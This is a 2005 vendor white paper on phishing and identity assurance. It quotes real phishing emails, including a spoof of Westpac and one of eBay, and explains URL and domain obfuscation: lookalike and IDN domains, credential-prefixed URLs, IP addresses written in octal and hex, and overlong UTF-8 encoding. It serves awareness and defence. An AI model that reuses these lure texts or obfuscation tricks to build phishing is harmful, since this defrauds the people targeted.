© 2005 Comodo Inc.

2

© 2005 Comodo Inc.

PREFACE

Identity theft has always been high on the agenda of any criminal. Once you have access to someone’s personal data and then move on to impersonate them, you have near anonymity to commit your crime.

One of the most prolific attack methods to obtain this necessary data over past 12+ months has been the Phishing attack. Specific attacks aimed at UK banking customers appeared towards the end of 2003, increasing with a vengeance during the first months of 2004 and steadily thereafter. Initially thought of as “all a fuss about nothing’ this one particular threat type - ‘Phishing’ is now headline news on almost a daily basis.

This white paper specifically addresses identity assurance on the Internet, highlighting the potentially devastating consequences of today’s browser tool set not providing any method of verification.

The underlying architecture of the browser itself is the weakest point, wherein nothing that you ‘see’ within the browser can be trusted.

The self same visual interface used every day by billions of internet users provides no methods of assurance as to the validity of the content being viewed – there is no trusted output mechanism, there is no identity assurance mechanism and therefore there is no verification.

Phishing scams have been increasing both in terms of number and level of sophistication, with a recent study by Gartner showing that some 57 Million US Internet users have identified the receipt of an e-mail linked to a Phishing scam. Studies by the Anti-Phishing work group have concluded that scams can yield up to 5% of all message receipts, and as with all criminal enterprises, if there is sufficient money to be made from Phishing attacks, then spoofed web sites, fraudulent banner advertising and other social engineering methods will be used more frequently to fuel ID theft.

Methods exist to provide a ‘degree’ of assurance as to legitimacy of a web site when the web server is secured with an SSL certificate, but this makes an assumption that the certificate was provided by a high assurance certification authority. Browsers do not differentiate between high and low assurance providers and likewise no methods exist to verify the actual content on the page. After all it’s long been said ‘don’t believe everything you read’ so maybe a more modern rendition in relation to the Internet should be…..

‘don’t believe anything you see’ ABBREVIATIONS

Certificate Policy CP Certificate Authority CA Certification Practice Statement CPS Certificate Revocation List CRL Certificate Signing Request CSR Content Verification Certificate CVC Hypertext Transfer Protocol with SSL HTTPS Identification and Authentication I&A

Internet Service Provider ISP Object Identifier OID Online Certificate Status protocol OCSP Public Key Infrastructure PKI Registration Authority RA Secure Socket layer SSL Top Level Domain TLD Uniform Resource Locator URL Verification Engine VE

CONTENTS PREFACE........................................................................................2 ABBREVIATIONS ............................................................................2 CONTENTS.....................................................................................2 IDENTITY THEFT & IDENTITY ASSURANCE ..................................3

A growing on-line community ................................................................. 3 A growing on-line threat......................................................................... 3 Phishing History ...................................................................................... 3 Example Scams migrating to the Internet .............................................. 4 Spam e-mail as a transport method ....................................................... 4 A Real-life Phishing Example .................................................................. 5 Web-based Delivery ................................................................................ 6 Fake Banner Advertising ......................................................................... 6 IRC and Instant Messaging ...................................................................... 7 Why is Identity Assurance so important? ................................................ 7 Verification in the ‘real’ world. ............................................................. 7 A real world example of ‘Cut and Paste’................................................ 8

ATTACK VECTORS & SOLUTIONS .................................................9 Man-in-the-middle Attacks ..................................................................... 9

DNS Cache Poisoning or’ host.ini’ file manipulation ....................... 9 Browser Proxy Configuration ........................................................... 9 URL Obfuscation .............................................................................. 9 Transparent Proxies ...................................................................... 10

URL Obfuscation Attacks ...................................................................... 10 Bad Domain Names ........................................................................ 10 Friendly Login URL’s...................................................................... 10 Third-party Shortened URL’s ......................................................... 10 Host Name Obfuscation ................................................................. 11 URL Obfuscation ............................................................................ 11 IDN Obfuscation Methods............................................................... 11

Cross-site Scripting Attacks .................................................................. 12 Preset Session Attack .................................................................... 12 Hidden Attacks .............................................................................. 13 Hidden Frames .............................................................................. 13 Overriding Page Content ............................................................... 13 Graphical Substitution................................................................... 13

Observing Customer Data ..................................................................... 14 Key-logging .................................................................................... 14 Screen Grabbing ............................................................................ 14 Client-side Vulnerabilities ............................................................. 14

IDENTITY ASSURANCE SOLUTIONS.............................................15 Today’s portfolio of solutions............................................................... 15 Client/User ........................................................................................... 15

Desktop – Endpoint Security Solutions........................................... 15 Digitally Signing e-mails ................................................................ 16 User Education – General Security Awareness ............................... 17 The choice of Internet Browser ..................................................... 17

Server/Enterprise ................................................................................. 17 Secure Socket Layer Certificates. ................................................. 18 Authentication of an organization................................................. 18 Site Identity Assurance Tools ........................................................ 20 Toolbars......................................................................................... 20 Managed Identity Assurance Services ............................................ 21 VERIFIED by VISA ........................................................................... 21 MASTERCARD SECURECODE............................................................ 21 Why is it possible to launch this type of attack? ........................... 22 What are Content Verification Certificates? ................................. 23

SUMMARY ....................................................................................24

3

© 2005 Comodo Inc.

IDENTITY THEFT & IDENTITY ASSURANCE The number of attack vectors by which Identify theft is perpetrated is increasing. Individuals and enterprises alike need to be aware of the types of attack and required tools to help them avoid being a victim.

A growing on-line community

Established with a series of sporadic jumps over the last decade, including complete cycles of boom and bust for many dot com companies, the success of the Internet as a medium for the mass delivery of electronic content cannot be denied. The ability to reach a global audience on a global scale has opened up a multitude of new business models, each of which has spawned its own commercial eco system to support the pull from new emerging markets. With the possibility of mass market success on a global scale equally attainable for companies of all sizes, coupled with the attractiveness of minimal set-up costs, 24 x 7 operation and the seemingly insatiable appetite of over 1 Billion potential customers, the first quarter of 2004 saw over 4.7 Million new domain name registrations, the highest in the history of the internet.

A growing on-line threat

The attractiveness of the medium also has a darker side in that Internet scams, Internet borne worms, viruses, Trojans, Spyware and other forms of malicious software have not just mirrored the growth, they have outpaced it. An extremely lucrative business model for organized crime, with the potential to provide funding to terrorist organizations, the Internet will never reach its full potential unless ubiquitous identity assurance methods are developed and implemented quickly across the on-line community.

In particular the acceleration of Phishing attacks now creates headline news on a daily basis with the latest findings showing loses of $500m for US consumers. A survey of 1,335 US net users conducted by think tank the Ponemon Institute found that three in four (76 per cent) are seeing an increase in spoofing and Phishing incidents and that 35 per cent receive fake emails at least once a week In 1940 David W Maurer published his classic study of the con-men of the early 20th Century. In it he described the ‘Autograph’, a con in which the ‘mark’ is induced to sign his autograph on a piece of paper, which is then converted to a negotiable cheque. Now in the 21st century, the autograph is being used on huge scale across the Internet – its modern name – Phishing.

With the high fear-factor associated with possible Phishing scams, organisations that take a proactive stance in protecting their customers’ personal information are likely to benefit from higher levels of trust and confidence in their services. In an era of shifting customer allegiances, protection against phishing scams may just become a key deciding factor in gaining their loyalty.

Phishing History

Originally the word “phishing” comes from the analogy where by early Internet criminals used email lures to “phish” for passwords and financial data from a sea of Internet users. The use of “ph” father than “f” is most likely linked to popular hacker naming conventions such as “Phreaks” which traces back to early hackers who were involved in “phreaking” – the hacking of telephone systems.

The term was coined in the 1996 timeframe by hackers who were stealing America Online (AOL) accounts by scamming passwords from unsuspecting AOL users. The popularised first mention on the Internet of phishing was made in alt.2600 hacker newsgroup in January 1996, however the term may have been used even earlier in the popular hacker newsletter “2600”.

It used to be that you could make a fake account on AOL so long as you had a credit card generator. However, AOL became smart. Now they verify every card with a bank after it is typed in. Does anyone know of a way to get an account other than phishing?

—mk590, "AOL for free?" alt.2600, January 28,1996

By 1996, hacked accounts were referred to as "phish", and by 1997 phish were actively being traded between hackers as a form of electronic currency. Phishers would routinely trade 10 working AOL phish for a piece of hacking software or warez (stolen copyrighted applications and games).

The earliest media citation referring to phishing wasn’t made until March 1997:

The scam is called 'phishing' — as in fishing for your password, but spelled differently — said Tatiana Gau, vice president of integrity assurance for the online service.

—Ed Stansel, "Don't get caught by online 'phishers' angling for account information," Florida Times-Union, March 16, 1997

As we will illustrate in the forthcoming sections, the definition of what constitutes a Phishing attack has changed over time and expanded beyond that of the original concept. The term Phishing now covers not only obtaining user account details, but access to all personal and financial data. Now ‘the mark’ ie the Internet user, is not only tricked into replying to emails to gain passwords and credit card details, but they are presented with spoofed websites, installation of Trojan horse key-loggers and screen captures, and man-in-the-middle data proxies – delivered through any electronic communication channel.

Due to the Phishers high success rate, an extension to the classic phishing scam now includes the use of fake jobsites or job offers. Applicants are enticed with the notion of making a lot of money for very little work – just creating a new bank account, taking the funds that have been transferred into it (less their personal commission) and sending it on as an international money order - classic money laundering techniques.

Social Engineering Factors

Attacks rely upon a mix of technical deceit and social engineering practices. In the majority of cases the attacker must persuade the victim to intentionally perform a series of actions that will provide access to confidential information. Communication channels such as e-mail, web-pages, IRC and instant messaging services are popular. In all cases the Phisher must impersonate a trusted source (e.g. the helpdesk of their bank, automated support response from their favourite online retailer, etc.) for the victim to believe.

4

© 2005 Comodo Inc.

To date, the most successful Phishing attacks have been initiated by e-mail – where the Phisher impersonates the sending authority (e.g. spoofing the source email address and embedding appropriate corporate logos) and luring the victim to a spoofed web site.

Some recent statistics (*Figures for October 2004)

Number of active Phishing sites* 1142 Average monthly growth rate July 2004-Oct 2004 25% Number of Brands hijacked by Phishing Campaigns* 44 Number if brands comprising the top 80% of campaigns* 6 Country hosting the most Phishing websites* USA Contain some form of target name in the URL 20.1% No hostname just an IP address 63% Percentage of sites not using port 80 12.2% Average time online for a site 6.4 days Longest time online for a site 31 days

For example, the victim receives an email supposedly from support@abcbank.com (address is spoofed) with the subject line 'security update’, requesting them to follow a URL to a site www.abcbank-validate.info (a domain name that belongs to the attacker – not the bank) and provide their banking PIN number.

However, the Phisher has many other nefarious methods of social engineering victims into surrendering confidential information. In the real example below, the email recipient is likely to have believed that their banking information has been used by someone else to purchase unauthorized services. The victim would then attempt to contact the email sender to inform them of the mistake and cancel the transaction. Depending upon the specifics of the scam, the Phisher would ask (or provide an online “secure” web page) for the recipient to type-in their confidential details (such as address, credit card number and security code, etc.), to reverse the transaction – thereby verifying the live email address (and potentially selling this information on to other spammers) and also capturing enough information to complete a real transaction.

Subject: Web Hosting – Receipt of Payment QdRvxrOeahwL9xaxdamLRAIe3NM1rL Dear friend, Thank you for your purchase! This message is to inform you that your order has been received and will be processed shortly. Your account is being processed for $79.85, for a 3 month term. You will receive an account setup confirmation within the next 24 hours with instructions on how to access your account. If you have any questions regarding this invoice, please feel free to contact us at tekriter.com. We appreciate your business and look forward to a great relationship! Thank You, The Tekriter.com Team ORDER SUMMARY ------------- Web Hosting............. $29.85 Setup................... $30.00 Domain Registration..... $20.00 Sales Date.............. 08/04/2004 Domain.................. nashshanklin.com Total Price............. $79.85 Card Type............... Visa

Example Scams migrating to the Internet

Here are a few of the more ‘real world’ scams that have now migrated to the Internet due to proven success of the social engineering attack vectors used and the ease at which spam can be sent to proliferate the attack.

• Advance Fee Loans. Legitimate lenders don’t usually ask for upfront fees. If there is an application or processing fee, it should be very small – not hundreds or even thousands of dollars.

• Bogus Credit Card Offers - A “gold” or “silver” card may not be what users think. Fraudulent credit card vendors promise “gold” or “silver” cards from major card issuers. What is sometimes received – if anything at all – is a gold or silver-colored charge card that can only be used to buy overpriced goods from the company’s own catalog.

• Business Opportunities & Franchises - The Federal Trade Commission’s (FTC) Franchise Rule requires franchise and business opportunity sellers to give you detailed written information; known as a “disclosure document,” at least 10 days before any money should change hands. Exciting offers of high return may be erroneous.

• Buyers Clubs – Users should be aware of “welcome packages.” Sometimes what looks to be an offer to join a buyers club may actually be a notice that they have already enrolled! Users should always read any documentation carefully!

• Charity Scams – Users approached by unfamiliar charities should always check them out. Most states require charities to register with them and file annual reports showing how they use donations. Users should ask state or local consumer protection agencies how to get this information.

• Computer Equipment and Software - If the seller is unfamiliar users again should check with state or local consumer protection agencies and the Better Business Bureau. Some Web sites have feedback forums, which can provide useful information about other people’s experiences with particular sellers. Users should always obtain the physical address and phone number in case of later problems.

• Fake Check Scams - Here an unknown seller would offer to pay by check so long as some money is wired back.

Spam e-mail as a transport method

Spam levels are now anywhere between 45% and 75% of all e-mail moving over the Internet, and with higher levels of ‘automation’ involved plus the negligible costs involved it’s easy to see why e-mail is a preferred method for Phishers. Using techniques and tools used by Spammers, Phishers can deliver specially crafted e-mails to millions of legitimate “live” email addresses within a few hours (or minutes using distributed Trojan networks). In many cases, the lists of addresses used to deliver the Phishing emails are purchased from the same sources as conventional spam.

5

© 2005 Comodo Inc.

Utilizing well known flaws in the common mail server communication protocol (SMTP), Phishers are able to create emails with fake “Mail From:” headers and impersonate any organization they choose. In some cases, they may also set the “RCPT To:” field to an email address of their choice (one which they can pickup email from); whereby any customer replies to the phishing email will be sent to them. The growing press coverage over phishing attacks has meant that most customers are very wary of sending confidential information (such as passwords and PIN information) by email – however it still successful in may cases.

Techniques used within Phishing emails:

• Official looking and sounding emails

• Copies of legitimate corporate emails with minor URL changes

• HTML based email used to obfuscate target URL information

• Standard virus/worm attachments to emails

• A plethora of anti spam-detection inclusions

• Crafting of “personalised” or unique email messages

• Fake postings to popular message boards and mailing lists

• Use of fake “Mail From:” addresses and open mail relays for disguising the source of the email

A Real-life Phishing Example

The following is an email sent to many thousands of Westpac banking customers in May 2004. Whilst the language sophistication is poor (probably due to the writer not being a native English speaker), many recipients were still fooled.

Subject: Westpac official notice

Westpac AustraIia's First Bank Dear cIient of the Westpac Bank, The recent cases of fraudulent use of clients accounts forced the Technical services of the bank to update the software. We regret to acknowledge, that some data on users accounts could be lost. The administration kindly asks you to follow the reference given below and to sign in to your online banking account: https://oIb.westpac.com.au/ib/defauIt.asp We are gratefuI for your cooperation. Please do not answer this message and follow the above mentioned instructions. Copyright © 2004 - Westpac Banking Corporation ABN 33 007 457 141.

Things to note with this particular attack:

• The email was sent in HTML format (some attacks use HTML emails that are formatted to look like they are plain-text – making is much harder for the recipient to identify the hidden “qualities” of the emails dynamic content).

• Lower-case L’s have been replaced with upper-case i’s. (l & I) This is used to help bypass anti-spam filters, and in most fonts (except for the standard Courier font used in this example) fools the recipient into reading them as L’s.

Default DefauIt Correct Incorrect

• Hidden within the HTML email were many random words. These words were set to white (on the white background of the email) so were not directly visible to the recipient. The purpose of these words was to help bypass standard anti-spam filters.

• Within the HTML-based email, the URL link https://oIb.westpac.com.au/ib/defauIt.asp in fact points to a escape-encoded version of the following URL:

http://olb.westpac.com.au.userdll.com:4903/ib/index.htm

• This was achieved using standard HTML coding such as:

<a href= http://olb.westpac.com.au.userdll.com:4903/ib/index.htm>

https://oIb.westpac.com.au/ib/defauIt.asp</a>

• The Phishers have used a sub-domain of USERDLL.COM in order to lend the illusion of it really being the Westpac banking site. Many recipients are likely to be fooled by olb.westpac.com.au.userdll.com.

• Rather than use the standard HTTP port, port 4903 was most likely used for the attack because the fake site was hosted on a third-party PC that had been previously compromised by an attacker.

• Recipients that clicked on the link were then forwarded to the real Westpac application. However a JavaScript popup window containing a fake login page was presented to them. Expert analysis of this JavaScript code identified that pieces of it had been used previously in another Phishing attack – one targeting HSBC. (As the original WestPac Phishing mail is no longer in circulation a more recent Phishing mail and resulting attack pop-up is illustrated below and opposite to illustrate the isues)

• This fake login window was designed to capture and store the recipient’s authentication credentials. The JavaScript also submitted the authentication information to the real application and forwarded them on to the site. Therefore the recipient would be unaware that their initial connection had been intercepted and their credentials captured.

6

© 2005 Comodo Inc.

(Correctly Identified as SPAM, however graphically convincing and having the same Pop-up effect with the browser as the WestPac example.)

Another recent example:-

The real web site is opened in the background

The Phishing pop-up

Web-based Delivery

With popular search engines like now holding some 8,058,044,651 individual web pages and with an average of 50,000 new web sites being registered every day coupled with greater and greater levels of automation involved within the registration of those new sites, policing the Internet to establish legitimacy is becoming ever more difficult. Taking advantage of these facts an increasingly popular method of conducting Phishing attacks is through malicious web-site content. This content may be included within a web-site operated by the Phisher, or a third party site hosting some embedded content or simply on a compromised web

site where the owner is unaware of the content now being delivered.

Web-based delivery techniques include:

• The inclusion of HTML disguised links (such as the one presented in the Westpac e-mail example earlier) within popular web-sites and message boards.

• The use of third-party supplied, or fake, banner advertising graphics to lure customers to the Phishers web-site.

• The use of web-bugs (hidden items within the page – such as a zero-sized graphic) to track a potential customer in preparation for a phishing attack.

• The use of pop-up or frameless windows set above legitimate sites (Initiated via a simple JavaScript call) to disguise the true source of the Phishers message, or indeed slightly more complex Pop-up windows with embedded graphics replacing the legitimate task bar, status bar on/or address bar.

• Embedding malicious content within the viewable web-page that exploits a known vulnerability within the customers web browser software and installs software of the Phishers choice (e.g. key-loggers, screen-grabbers, back-doors and other Trojan horse programs).

• Abuse of trust relationships within the customers web-browser configuration to make use of site-authorised scriptable components or data storage areas.

• The use of cross site scripting techniques (XSS) to provide legitimacy to some portion of a spoofed web site.

Fake Banner Advertising

Everybody is familiar with banner advertising on web sites and how many times do we question the legitimacy of the advertisement? It is therefore a very simple method whereby Phishers redirect customers to fake web-sites to capture confidential information. Using copied banner advertising, and placing it on popular websites, all which is necessary is some simple URL obfuscation techniques to obscure the final destination. (See a later section)

Banner advertising is an extremely popular service and highly lucrative and therefore attractive to websites with high traffic figures. It is a simple proposition for the Phisher to create their own online account (providing a graphic such as the one above and a URL of their choice) and have the service provider automatically distribute it to many of their managed websites. Using stolen credit cards or other banking information, the Phisher can easily conceal their identity from law enforcement agencies.

7

© 2005 Comodo Inc.

IRC and Instant Messaging

Internet Relay Chat (IRC) and Instant Messaging (IM) forums are becoming ever more popular due to their increased usage by home users, the primary target of the Phisher. As more functionality is included within the software, specialist Phishing attacks will increase, certainly where embedded dynamic content (e.g. graphics, URL’s, multimedia includes, etc.) can be sent by channel participants. Phishers may use the same Phishing techniques as standard web-based attacks.

The common usage of Bots (automated programs that listen and participate in group discussions) in many of the popular channels, means that it is very easy for a Phisher to anonymously send semi-relevant links and fake information to would-be victims.

Also as can be seen below, Malware (the group term for Spyware, Viruses, Trojans, Worms and other similar code) is on the increase through ‘shared drives’, where as once the humble floppy disk was the transport mechanism now USB keyfobs with far greater storage capabilities are a major source of viral infections within the enterprise.

Malware Distribution by Vector Source: Trend Micro World Malware Tracking Center

Trojaned Hosts

The huge increase in the adoption of DSL/cable based internet connection methods for home users has allowed Phishers, Spammers, Warez Pirates, DDoS Bots, etc to make use of a far wider base from which to propagate an attack. Consequently, tracking back a Phishing attack to an individual is extremely difficult.

It is important to note that the installation of Trojan horse software is on the increase, despite the efforts of large anti-virus companies. Many malicious or criminal groups have developed highly successful techniques for tricking home users into installing the software, and now operate large networks of Trojan deployments (networks consisting of thousands of hosts are not uncommon) capable of being used as Phishing email propagators or even hosting fraudulent web-sites.

Why is Identity Assurance so important?

Identity assurance is paramount to the success of the Internet with legislation now in place in the United States across many industry sectors, including well publicized bills such as (HIPAA) the Health Insurance Portability and Accountability Act, confidentiality and security concerns cannot be fully addressed unless it is possible to be assured of the identity of the party to which information is submitted –

Verification is required.

Verification in the ‘real’ world.

To better illustrate the significance of verification let’s take an example familiar to everyone - Currency

How to Detect Counterfeit Currency – Advice from the US treasury and the Department of Homeland Defense

http://www.ustreas.gov/usss/money_detect.shtml

“The public has a role in maintaining the integrity of our currency. You can help guard against the threat from counterfeiters by becoming more familiar with United States currency. Look at the money you receive. Compare a suspect note with a genuine note of the same denomination and series, paying attention to the quality of printing and paper characteristics. Look for differences.

Portrait

The genuine portrait appears lifelike and stands out distinctly from the background. The counterfeit portrait is usually lifeless and flat. Details merge into the background which is often too dark or mottled.

Federal Reserve and Treasury Seals

On a genuine bill, the saw-tooth points of the Federal Reserve and Treasury seals are clear, distinct, and sharp. The counterfeit seals may have uneven, blunt, or broken saw-tooth points.

Border

The fine lines in the border of a genuine bill are clear and unbroken. On the counterfeit, the lines in the outer margin and scrollwork may be blurred and indistinct.

8

© 2005 Comodo Inc.

Serial Numbers

Genuine serial numbers have a distinctive style and are evenly spaced. The serial numbers are printed in the same ink color as the Treasury Seal. On a counterfeit, the serial numbers may differ in color or shade of ink from the Treasury seal. The numbers may not be uniformly spaced or aligned.

Paper

Genuine currency paper has tiny red and blue fibers embedded throughout. Often counterfeiters try to simulate these fibers by printing tiny red and blue lines on their paper. Close inspection reveals, however, that on the counterfeit note the lines are printed on the surface, not embedded in the paper. It is illegal to reproduce the distinctive paper used in the manufacturing of United States currency.”

A real world example of ‘Cut and Paste’

Genuine paper currency is sometimes altered in an attempt to increase its face value. A common method is to glue numerals from higher denomination notes to the corners of lower denomination notes.

Given enough resources (time and effort), the visual elements above can each be circumvented, therefore additional techniques are implemented both in the US and in other countries such as UV protection, metallic threads and foil holograms. These additional protection mechanisms require alternative forms of verification, most of which are not available to the average user.

With $billions of dollars in trade now moving across the internet on a daily basis, what methods of verification are available? The following sections look at attack vectors used and solutions that move some way towards providing a degree of assurance, but as can be demonstrated at the end of each section changes in business processes, cost cutting and methods of circumvention are able to effect most of the current crop of commercially available safeguards.

9

© 2005 Comodo Inc.

ATTACK VECTORS & SOLUTIONS Phishing attacks use a combination of social engineering and technical wizardry to ‘dupe’ the victim. These attacks are becoming more sophisticated and plausible with every passing day and now cover some of the most advanced programming techniques around. Some of the most common attack methods are discussed below. The next section then details solutions together with a summary of their relevant merits against these attack vectors. Common attacks include:

• Man-in-the-middle Attacks

• URL Obfuscation Attacks

• Cross-site Scripting Attacks

• Preset Session Attacks

• Observing Customer Data

• Client-side Vulnerability Exploitation

Man-in-the-middle Attacks

A very successful attack method applicable to a wide variety of scenarios is a man-in-the-middle attack. These involve a malicious attacker intercepting communications and fooling both parties into believing they are communicating with each other when they are really being monitored. From this vantage point, the attacker can observe and record all transactions and information submitted by the victim. The attacker then proxies this information to the genuine web application (for example, a payment gateway) in real time. Analogous with someone intercepting post and then resealing the envelopes!

The customer remains oblivious to the man-in-the-middle attack because the customer connects to the attacker’s server as if it were the real site. The attacker’s server makes a simultaneous connection to the real site, relaying all information passed to it. This attack vector is equally applicable to HTTP and HTTPS connections.

Obviously, for man-in-the-middle attacks to be successful, the attacker must be able to re-direct the victim through his own,

spurious, proxy server. This can be achieved using a number of techniques, including:

• DNS Cache Poisoning or host file manipulation

• Browser Proxy Configuration

• URL Obfuscation

• Transparent Proxies

DNS Cache Poisoning or’ host.ini’ file manipulation

Harder to implement, “DNS Cache Poisoning” is used to disrupt normal traffic routing by injecting false IP addresses for key domain names. DNS (Domain Name Service) is basically a lookup table matching FQDN (Fully Qualified Domain Names) to IP addresses. These look up tables are propagated around the world from a central set of DNS servers, however, local caches are kept for speed increases or to provide only ‘local addresses’ (For example on a Windows machine hosts.ini) has it’s own local look up table of IP addresses. Trojans and malware have the ability to manipulate the local host file on an infected system.

Browser Proxy Configuration

Browser such as Internet Explorer can be configured so that web traffic is forced through a proxy. Browser proxy configuration attacks involve overriding a user’s settings to send all information through an attacker’s nominated server. The victim’s settings are usually altered prior to them receiving a phishing email in order to ‘prime’ them for a successful attack.

Fortunately, this attack is not transparent to the user and can be detected by a user reviewing their browser settings and identifying the ‘foreign’ proxy server.

URL Obfuscation

URL obfuscation involves deceiving the customer into connecting to the attacker’s proxy server rather than the genuine server. Attackers typically use URL’s that are so similar to the original that they often get overlooked at a first glance. For example, the victim may follow a link to http://www.abcbank.com.ch/ instead of http://www.abcbank.com/

10

© 2005 Comodo Inc.

Transparent Proxies

Transparent Proxies differ to normal proxy servers in that they are ‘invisible’ to the end user and cannot be detected via a simple review of browser settings. The user does not enter specific network settings or configure settings for their HTTP traffic to be captured by a transparent proxy. Because they are built as part of the network architecture, all port 80 traffic must flow through them. This type of proxy is usually situated en-route to the real server (e.g corporate gateway or intermediary ISP) and intercepts all outbound HTTP and HTTPS data. This type of connection architecture has gained more popularity recently as ‘Content filtering’ solutions have been introduced into the market across enterprises. The advantage of a transparent proxy is that no configuration changes are required at the customer end and it is therefore paramount that any Content Filter is free from vulnerabilities.

URL Obfuscation Attacks

Many Phishing attacks succeed by duping the recipient to follow a hyperlink (URL) to the attacker’s server, whilst under the impression that they are connected to the legitimate server. Phishers can now draw upon a wide range of techniques to obfuscate a URL and camouflage the true destination of a user’s web request.

The most common methods of URL obfuscation include:

• Bad domain names

• Friendly login URL’s

• Third-party shortened URL’s

• Host name obfuscation

• URL obfuscation

• IDN obfuscation methods

Bad Domain Names

This involves registering a domain with a URL that closely resembles the real organization’s URL with the specific intention of fooling customers into believing they are on the genuine site.

(See the Validation section on Page 18)

For example, the fictional financial organization ABCBank has the registered domain abcbank.com and the customer transactional site http://privatebanking.abcbank.com. The phisher then sets up a fake server and could, legitimately, use any of the following names to confuse the customer:

• http://privatebanking.abcbank.com.ch

• http://abcbank.privatebanking.com

• http://privatebanking.abcbonk.com

• http://privatebanking.abcbánk.com

• http://privatebanking.abcbank.hackproof.com

With increasing volumes and falling prices, DNR (Domain Name Registrars) move to internationalize their services for increased cross border trade, it is possible to register domain names in other languages and their specific character sets. For example, the Cyrillic “o” looks identical to the standard ASCII “o” but can be used for different domain registration purposes - as pointed

out by a company who registered microsoft.com in Russia a few years ago. Finally, it is worth noting that even the standard ASCII character set allows for ambiguities such as upper-case “i” and lower-case “L” as shown earlier in this section.

Friendly Login URL’s

One method of user authentication is the complex URL that includes both login and password details. Generally, the form of such URL’s is: URL://username:password@hostname/path.

By substituting the username and password fields with details that seem consistent with the target organization, phishers can often fool customers into believing they are at the genuine site.

For example the following URL sets the username = abcbank.com, password = ebanking and the destination hostname is fakesite.com.

http://abcbank.com:ebanking@fakesite.com/phishing/fakepage.htm

Due to its success, many browsers have ceased support for this method of user authentication

Third-party Shortened URL’s

Many web applications produce long and complex URLs that create problems with wrapping in many email representation systems. This often causes the URL to ‘break’, forcing the recipient to recreate the original link by cutting and pasting it directly into the browser. In order to prevent email clients breaking such URL’s, many third party organizations have started to provide free services that shorten such URLs to a manageable length. Common free services include http://smallurl.com and http://tinyurl.com

Phishers have taken to sending emails with deliberately broken or incorrect complex URLs alongside a ‘shorter’ version, which actually points to the spoof website.

Dear eBay member,

As part of our continuing commitment to protect your account and to reduce the instance of fraud on our website, we are undertaking a periodic review of our member’s accounts. You are requested to visit our site by following the link given below http://arribba.cgi3.ebay.com/aw-cgi/ebayISAPI.dll?UpdateInformationConfirm&bpuser=1&Sess=asp04&passwordvalidate=true&changepassword=true

If this URL does not work, please use the following link which will redirect to the full page detailed above:

http:tinyurl.com/7tyk Please fill in the required information. This is required for us to continue to offer you a safe and risk free environment to send and receive money online, and maintain the eBay experience. Thank you

Copyright © 1995-2003 eBay Inc. All Rights Reserved. Designated trademarks and brands are the property of their respective owners. Use of this Web site constitutes acceptance of the eBay User Agreement and Privacy Policy .

11

© 2005 Comodo Inc.

Host Name Obfuscation

The majority of Internet users will navigate to sites by typing the Fully Qualified Domain Name (FQDN) into their browser eg www.phishingwebsite.com. However, for the browser to actually reach the intended site, it must resolve the FQDN to an IP address such as 103.126.134.21 – which equates to www.fakesite.com.

Such resolution is achieved through the system of Domain Name Servers (DNS) and provide phishers with an effective way of obfuscating a host and hiding the real destination of a link.

E.g. This URL may well seem suspicious to the average receipt:

http://abcbank.com:ebanking@phishingwebsite.com/login.htm

However, ‘re-phrased’ in the following format, it not only divulges much less information about the true destination but also looks more convincing:

http://abcbank.com:ebanking@103.126.134.21/login.htm

Even customers who are familiar with the dotted-decimal style notation (000.000.000.000), may not be familiar with alternative representations. Implementing such alternative IP representations within an URL, makes it possible obscure the host destination even further. Alternative formats include:

• Dword - meaning double word because it consists essentially of two binary "words" of 16 bits; but it is expressed in decimal (base 10),

• Octal - address expressed in base 8, and

• Hexadecimal - address expressed in base 16.

For example: The fake website http://www.phishingwebsite.com resolves to 103.126.134.21, which can be alternately represented as:

• Decimal – http://210.134.161.35/

• Dword – http:// 3532038435/

• Octal – http://0322.0206.0241.0043/

• Hexadecimal – http://0xD2.0x86.0xA1.0x23/ or even http://0xD286A123/

• In some cases, it may be possible to mix formats (e.g. http://0322.0x86.161.0043/).

URL Obfuscation

To facilitate multi-language support amongst internet software such as browsers and email clients, most software supports alternate encoding systems for data. By using one (or a combination) of these alternate encoding schemes, it is easy for a Phisher to effectively conceal the actual destination and nature of a malicious URL. Most web browsers support these alternate encoding schemes which can be interpreted in different ways by web servers and their custom applications. Prominent encoding schemes include:

• Escape Encoding – Escaped-encoding, or sometimes referred to as percentencoding, is the accepted method of representing characters within a URL that may need special syntax handling to be correctly interpreted. This is achieved by encoding the character to be interpreted with a sequence of three characters. This triplet sequence consists of the percentage character “%” followed by the two hexadecimal digits representing the octet code of the original character. For example, the USASCII character set represents a space with octet code 32, or hexadecimal 20. Thus its URL-encoded representation is %20.

• Unicode Encoding – Unicode is an international standard for representing a broader character set using a two-byte encoding for each letter. This allows the encoding of 65,536 characters in a single font instead of 256: essentially all the characters for every language in the world, each with a unique ID. Unicode Encoding each character in each script used in the world is given a unique identifier (4-digit hexadecimal (base 16) number). This means that letter "a" will always have the same character code, no matter what system you are working on. It doesn't directly handle different representations of the same character in different languages, such as characters which are the "shared" between Japanese, Korean, and simplified and traditional Chinese, but may be written differently in some or all of these languages. It does however include compatibility with most pre-existing encoding standards.

• Inappropriate UTF-8 Encoding – One of the most commonly utilised formats, Unicode UTF-8, has the characteristic of preserving the full US-ASCII character range. This great flexibility provides many opportunities for disguising standard characters in longer escape-encoded sequences. For example, the full stop character “.” may be represented as %2E, or %C0%AE, or %E0%80%AE, or %F0%80%80%AE, or %F8%80%80%80%AE, or even %FX%80%80%80%80%AE.

• Multiple Encoding – Various guidelines and RFC's carefully explain the method of decoding escape encoded characters and hint at the dangers associated with decoding multiple times and at multiple layers of an application. However, many applications still incorrectly parse escape-encoded data multiple times. Consequently, Phishers may further obfuscate the URL information by encoding characters multiple times (and in different fashions). For example, the back-slash “\” character may be encoded as %25 originally, but could be extended to: %255C, or %35C, or %%35%63, or %25%35%63, etc.

IDN Obfuscation Methods

Punycode, defined in RFC 3492, is a self-proclaimed "Bootstring encoding" of Unicode strings into the limited character set supported by the Domain Name System. The encoding is used as part of IDNA, which is a system enabling the use of internationalized domain names in all languages supported by Unicode, where the burden of translation lies entirely with the user application (e.g., web browser).

12

© 2005 Comodo Inc.

The encoding is applied separately to each component of a domain name which is not representable solely within the ASCII charcter set, and a reserved prefix 'xn--' is added to the translated Punycode string. For example, bücher becomes bcher-kva in Punycode, and therefore the domain name bücher.ch would be represented as xn--bcher-kva.ch in IDNA.

The issue however is that alternative representations of more well recognized URLs such as "http://www.pаypal.com/", which the browsers punycode handlers render as www.xn--pypal-4ve.com can be used within attacks on IDN complaint browsers such as Mozilla, Firefox. Opera and Safari.

Cross-site Scripting Attacks

